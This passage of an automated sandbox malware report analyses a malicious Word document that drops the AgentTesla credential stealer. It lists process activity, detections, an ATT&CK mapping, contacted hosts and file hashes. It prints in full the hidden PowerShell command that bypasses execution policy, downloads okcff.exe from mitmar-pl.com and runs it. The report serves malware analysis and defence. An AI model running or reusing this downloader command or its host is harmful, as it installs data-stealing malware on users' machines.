                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\okcff.exe, Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\okcff.exe, Window / User API: threadDelayed 9438
                    Source: C:\Users\user\AppData\Roaming\okcff.exe, WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process information queried: ProcessInformation
                    Source: C:\Users\user\AppData\Roaming\okcff.exe, Thread delayed: delay time: 30000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                    Source: okcff.exe, 00000009.00000002.620634062.000000000079D000.00000004.00000020.sdmp, Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\okcff.exe, Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\okcff.exe, Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion:

                    Injects files into Windows application
                    Source: C:\Windows\System32\notepad.exe, Injected file: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    Bypasses PowerShell execution policy
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Roaming\okcff.exe, Memory written: C:\Users\user\AppData\Roaming\okcff.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Users\user\AppData\Roaming\okcff.exe "C:\Users\user\AppData\Roaming\okcff.exe"
                    Source: C:\Users\user\AppData\Roaming\okcff.exe, Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exe, Process created: C:\Users\user\AppData\Roaming\okcff.exe C:\Users\user\AppData\Roaming\okcff.exe
                    Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: notepad.exe, 00000018.00000002.699385356.0000000000730000.00000002.00020000.sdmp, Binary or memory string: Shell_TrayWnd
                    Source: notepad.exe, 00000018.00000002.699385356.0000000000730000.00000002.00020000.sdmp, Binary or memory string: !Progman
                    Source: notepad.exe, 00000018.00000002.699385356.0000000000730000.00000002.00020000.sdmp, Binary or memory string: Program Manager<
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Queries volume information: C:\Windows\hh.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\okcff.exe, Queries volume information: C:\Users\user\AppData\Roaming\okcff.exe VolumeInformation
                    Source: C:\Windows\System32\notepad.exe, Queries volume information: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\okcff.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\okcff.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information:

                    Yara detected AgentTesla
                    Source: Yara match, File source: 41.0.okcff.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 41.0.okcff.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 9.2.okcff.exe.3605ff0.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 41.0.okcff.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 9.2.okcff.exe.3605ff0.7.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 9.2.okcff.exe.351f270.5.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 41.0.okcff.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 9.2.okcff.exe.34f7250.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 41.0.okcff.exe.400000.11.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 41.2.okcff.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 9.2.okcff.exe.351f270.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 9.2.okcff.exe.35871d0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 9.2.okcff.exe.2584fcc.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000029.00000000.618395445.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000029.00000000.617550638.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000029.00000000.615331968.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000029.00000002.700177359.00000000022A1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: okcff.exe PID: 2656, type: MEMORYSTR

                    Remote Access Functionality:

                    Yara detected AgentTesla

                    Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 211 | Path Interception | Process Injection 212 | Disable or Modify Tools 1 | OS Credential Dumping | File and Directory Discovery 2 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scripting 3 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Deobfuscate/Decode Files or Information 1 | LSASS Memory | System Information Discovery 114 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Shared Modules 1 | Logon Script (Windows) | Logon Script (Windows) | Scripting 3 | Security Account Manager | Security Software Discovery 211 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Exploitation for Client Execution 33 | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 2 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 22 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Command and Scripting Interpreter 11 | Network Logon Script | Network Logon Script | Software Packing 1 | LSA Secrets | Virtualization/Sandbox Evasion 131 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | PowerShell 3 | Rc.common | Rc.common | Timestomp 1 | Cached Domain Credentials | Application Window Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Masquerading 1 | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion 131 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 212 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

                    Behavior Graph

[Behavior graph. ID: 553100, Sample: 478644.doc, Start date: 14/01/2022, Architecture: WINDOWS, Score: 100. Process tree as shown: WINWORD.EXE contacts mitmar-pl.com (37.0.9.166, WKD-ASIE, Netherlands), drops okcff[1].exe (PE32) among other files, and starts two powershell.exe processes, notepad.exe and 2 other processes. One powershell.exe drops C:\Users\user\AppData\Roaming\okcff.exe (PE32); the other starts okcff.exe, which starts cmd.exe processes that in turn start timeout.exe.]

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

Source | Detection | Scanner | Label
478644.doc | 41% | Virustotal |
478644.doc | 31% | ReversingLabs | Document-Office.Trojan.RTFObfustream

                    Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\okcff.exe | 100% | Joe Sandbox ML |

                    Unpacked PE Files

Source | Detection | Scanner | Label
41.0.okcff.exe.400000.5.unpack | 100% | Avira | TR/Spy.Gen8
41.0.okcff.exe.400000.7.unpack | 100% | Avira | TR/Spy.Gen8
41.0.okcff.exe.400000.9.unpack | 100% | Avira | TR/Spy.Gen8
41.0.okcff.exe.400000.13.unpack | 100% | Avira | TR/Spy.Gen8
41.0.okcff.exe.400000.11.unpack | 100% | Avira | TR/Spy.Gen8
41.2.okcff.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1138205

                    Domains

                    No Antivirus matches

                    URLs

Source | Detection | Scanner | Label
httP://mitmar-pl.com/okcff.ex | 0% | Avira URL Cloud | safe
http://mitmar-pl.com/Crkrqdrd.jpegi | 0% | Avira URL Cloud | safe
httP://mitmar-pl.com/okcff.exe | 0% | Avira URL Cloud | safe
http://mitmar-pl.com/Crkrqdrd.jpeg | 0% | Avira URL Cloud | safe
https://google.comD | 0% | Avira URL Cloud | safe
httP://mitmar-pl.com/okcff.exePE | 0% | Avira URL Cloud | safe
http://mitmar-pl.com | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
httP://mitmar-pl.com/ok | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe

                    Domains and IPs

                    Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
mitmar-pl.com | 37.0.9.166 | true | true | | unknown

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://mitmar-pl.com/okcff.exe | false | | unknown
http://mitmar-pl.com/Crkrqdrd.jpeg | false | Avira URL Cloud: safe | unknown

                        URLs from Memory and Binaries


                                                          Contacted IPs

                                                          Public

IP | Domain | Country | ASN | ASN Name | Malicious
37.0.9.166 | mitmar-pl.com | Netherlands | 198301 | WKD-ASIE | true

                                                          General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 553100
Start date: 14.01.2022
Start time: 10:22:19
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 37s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 478644.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 43
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winDOC@53/21@4/1
                                                          EGA Information:
                                                          • Successful, ratio: 25%
                                                          HDC Information:
                                                          • Successful, ratio: 0.9% (good quality ratio 0.8%)
                                                          • Quality average: 64.2%
                                                          • Quality standard deviation: 30.7%
                                                          HCA Information:
                                                          • Successful, ratio: 99%
                                                          • Number of executed functions: 280
                                                          • Number of non-executed functions: 12
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .doc
                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                          • Attach to Office via COM
                                                          • Active ActiveX Object
                                                          • Scroll down
                                                          • Close Viewer
                                                          Warnings:
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe
                                                          • Execution Graph export aborted for target okcff.exe, PID 2176 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 1308 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 2904 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                          Simulations

                                                          Behavior and APIs

Time | Type | Description
10:22:29 | API Interceptor | 95x Sleep call for process: powershell.exe modified
10:22:35 | API Interceptor | 722x Sleep call for process: okcff.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs


                                                          Domains


                                                          ASN


                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exe
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:downloaded
                                                          Size (bytes):194560
                                                          Entropy (8bit):4.668942832070624
                                                          Encrypted:false
                                                          SSDEEP:1536:QLwio+gEPHeB9PYR0uQ7nXhMM70iOVcse5m6h:rt+gIHeB9PYRnQL6S5
                                                          MD5:E9416A322E9A796D45588BC4FB04CD45
                                                          SHA1:8D261D205C8D34A4A24B713DD6B9585647B8BDEB
                                                          SHA-256:F2DA177AFF59093ABE1D3BC7C1A769BE2701784036C398900A43725D83C9E9A9
                                                          SHA-512:9A1FF2B39DFD93D3B6EAED4685876E8BF877BD1695FDC7095B74ABEADAFBAEE785815FEB75585D31299B3D0A18B5E88890DA942D65F407171C28CAF66655C5AE
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          IE Cache URL:http://mitmar-pl.com/okcff.exe
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\570DA74A.wmf
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:Targa image data - Map - RLE 1569 x 65536 x 0 +2 "\005"
                                                          Category:dropped
                                                          Size (bytes):3712
                                                          Entropy (8bit):5.036435545575714
                                                          Encrypted:false
                                                          SSDEEP:96:Gk7Hgwj+mbYf3LSrhlOs0f5aSdHn63Dx3:Gk7Awam8fI4s0f5ap3
                                                          MD5:F238B72FF240B9EA28769FFFB0C11843
                                                          SHA1:54EDB9197B4A4C9C3CFFF894A83174DD17DDA9D2
                                                          SHA-256:A37AE38F17314E0B3C0967F597285E9EC9CA175B6DC223ECF76BC6CE79586E05
                                                          SHA-512:4AA9A9EF5432C866F996679D58358CC02DF2CF07346AA030E643EB70258957058EBE10E0EF7CA7E6B41DECE1C99539B738864A24D9DD118E60206263C17620DB
                                                          Malicious:false
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7CE2D32D.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:370 sysV pure executable
                                                          Category:dropped
                                                          Size (bytes):262160
                                                          Entropy (8bit):0.05136362991589137
                                                          Encrypted:false
                                                          SSDEEP:48:YpVMBmYIjDBgdEJdOcfd/Xdd/u9N7zGkqfoQ6eI:Yp/zb+HGffFE
                                                          MD5:A8A92E1C3D97E40596840C5045F94F67
                                                          SHA1:B2B4FB6D579C92F649582F63CC89D7B190AD8025
                                                          SHA-256:2C26843633ABB38F10B1D93AF2D96AC746C7C060EF69E06B113707F3F7FE8E74
                                                          SHA-512:048BAC628842FFEB7A9D218F3E680D38267A3FADA8DFED6DE1C60FA4F7D3BF7B8FA2681D0393D6A7520AE1F594E9649B470550B4344082B3FCDA62AF6A82E112
                                                          Malicious:false
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):212992
                                                          Entropy (8bit):4.7464056683239715
                                                          Encrypted:false
                                                          SSDEEP:3072:QbzakaBa9aRaOa2TF7sbzakaBa9aRaOa2TF7:KzakaBa9aRaOa2TozakaBa9aRaOa2T
                                                          MD5:D7EF29F80097BDF434F81F076289F2D4
                                                          SHA1:231DCAD0641F6DDF6D28A89D9AAF4102B261E693
                                                          SHA-256:8451756E2D56C1A430FCABA7DB51CF20ADEA6B83DB858E18AF6ABE4441238EA9
                                                          SHA-512:0454576AB79FAC0588046D19ACD5C562B7295C34C98C579E62D3667AADF72F6A31A5C68EFA736DBCDEE0A1F5FC30468CDFD5A6A25C00900FB22D7AF7D6D36DD2
                                                          Malicious:false
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4FAE5255-02F9-464D-A70F-CC3F2B77B94E}.tmp
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1536
                                                          Entropy (8bit):1.3573187972516119
                                                          Encrypted:false
                                                          SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbG:IiiiiiiiiifdLloZQc8++lsJe1Mzl/n
                                                          MD5:21C2AF2BB9957FFECAD589E76FF8BA89
                                                          SHA1:08DDE72BB9349A555263E85CCDC477DB202E85FE
                                                          SHA-256:79586CFF1216985B54C69EC7D60FEB94DE375C824B633C32151F883FC4822991
                                                          SHA-512:CADC111BE5DA804F427AB8B4CF9652F09223A9BD2B220376D1E88CCD78A37A159C6B79A2DEF38E5D0D0B25D7402FA5B1721CEFECF35C6EF51DA46290A2C06D1F
                                                          Malicious:false
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5349C035-C6A0-4C16-B632-E1A36FB414FC}.tmp
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1024
                                                          Entropy (8bit):0.05390218305374581
                                                          Encrypted:false
                                                          SSDEEP:3:ol3lYdn:4Wn
                                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                          Malicious:false
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8C959E4C-92E1-4241-AA94-1568DABC6F24}.tmp
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):44016
                                                          Entropy (8bit):2.8832027230024
                                                          Encrypted:false
                                                          SSDEEP:768:IT/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:AFia0Dqeb0nstw29rVzWSgm58F
                                                          MD5:D320E2636A4FE368F1DD1721A88C0B72
                                                          SHA1:6DE8E522B7C191677F9A8668BFF895F3E7E0FB64
                                                          SHA-256:C73D18662DFD69AABA06F46A599560EC230124395B678230C4F0F8DFE83CA475
                                                          SHA-512:9B27E59DE735F81C7766AC2439057D6433D424C7CFF333274DE3736CCEA492BCFF08A6D0D3183E480CCB78040993DC00A174E3D5C444E63AD1E9FDEA28D501EB
                                                          Malicious:false
                                                          C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):96978
                                                          Entropy (8bit):4.476034550957548
                                                          Encrypted:false
                                                          SSDEEP:768:+abzakaBa9aRaOa2O2jOLWRoNVYwUn7ZwPW1DGJ:+abzakaBa9aRaOa2TENa7A
                                                          MD5:30DD770655427043A65B4CA45F7443C6
                                                          SHA1:3BBC7640A0D21F941D342532405FE6B62BC1C423
                                                          SHA-256:C48F7949E36EA00828F752C9A5A2BAA48FA6F867BA9013025B6D6CB858F31768
                                                          SHA-512:188F28CC8E3FB2C14F34360BDD0CD137B17162DA59017A9C42E9559837ECBE56BE290A93B715E3F2F3F1CF7CC28343CDC497E6EA0303275530D450C3204B63BE
                                                          Malicious:true
                                                          C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT:Zone.Identifier
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:gAWY3n:qY3n
                                                          MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                          SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                          SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                          SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                          Malicious:false
                                                          Preview: [ZoneTransfer]..ZoneId=3..
                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\478644.LNK
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:56 2021, mtime=Mon Aug 30 20:08:56 2021, atime=Fri Jan 14 17:22:23 2022, length=392070, window=hide
                                                          Category:dropped
                                                          Size (bytes):992
                                                          Entropy (8bit):4.516683865071603
                                                          Encrypted:false
                                                          SSDEEP:12:8Cr1I0gXg/XAlCPCHaXjByB/AVtX+WLUyVNicvbMK5DtZ3YilMMEpxRljKPtt6Tg:8nk/XTTc+bRUM0ef5Dv3qwtiR7m
                                                          MD5:0F74FC3AD8670059320D5A7767BB0A3E
                                                          SHA1:6305BC2235CB1924EAB45008C8B4FD0BB9B6CFF9
                                                          SHA-256:132354D2946AB264EFA224DF2AE58E9BA7FB67122F3672BC8F6A564CBF8C609A
                                                          SHA-512:207815791EB8572911BF33A0E4B5E2AE24A53D8514210F170BBF345D57847D4A4BEA7924B2ABFE92A76631763A0D1A34EE980A29A9ADEA4B14B3484F16D66B89
                                                          Malicious:false
                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):63
                                                          Entropy (8bit):4.548497884319839
                                                          Encrypted:false
                                                          SSDEEP:3:bDuMJlSLjomX1RuT3Ljov:bCLjC7jy
                                                          MD5:0BF65FC4D2E1FE20737B46427E7DB0D2
                                                          SHA1:F210ABEDA65F65C2DE79F07D3049C4C5DB489CF6
                                                          SHA-256:612DDD432589CB1586BEE2B9173D880A3E1FDBA888D40DB2D8D8F6AE9A96E186
                                                          SHA-512:0D5CC6582ECCF2E8CC0E1B19CBEB72AC621306D1DABB3BCD89B09BBE309D00788EE3858E9607FBA56456EC354C3B0D9E87BC10F94B36994F61ECC3ED546B6743
                                                          Malicious:false
                                                          Preview: [folders]..Templates.LNK=0..478644.LNK=0..[doc]..478644.LNK=0..
                                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):162
                                                          Entropy (8bit):2.5038355507075254
                                                          Encrypted:false
                                                          SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                          MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                          SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                          SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                          SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                          Malicious:false
                                                          Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                          C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):2
                                                          Entropy (8bit):1.0
                                                          Encrypted:false
                                                          SSDEEP:3:Qn:Qn
                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                          Malicious:false
                                                          Preview: ..
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.582206362297639
                                                          Encrypted:false
                                                          SSDEEP:96:chQCQMqlqvsqvJCwoiiz8hQCQMqlqvsEHyqvJCworwizKAYuHXiKXX2lUV8iA2:cWUoiiz8WAHnorwizKoiKXXKiA2
                                                          MD5:484FCA57FA5B39E59B75DE31E510D704
                                                          SHA1:A9A4B2579158D1C71122D7C1418C78B497B41570
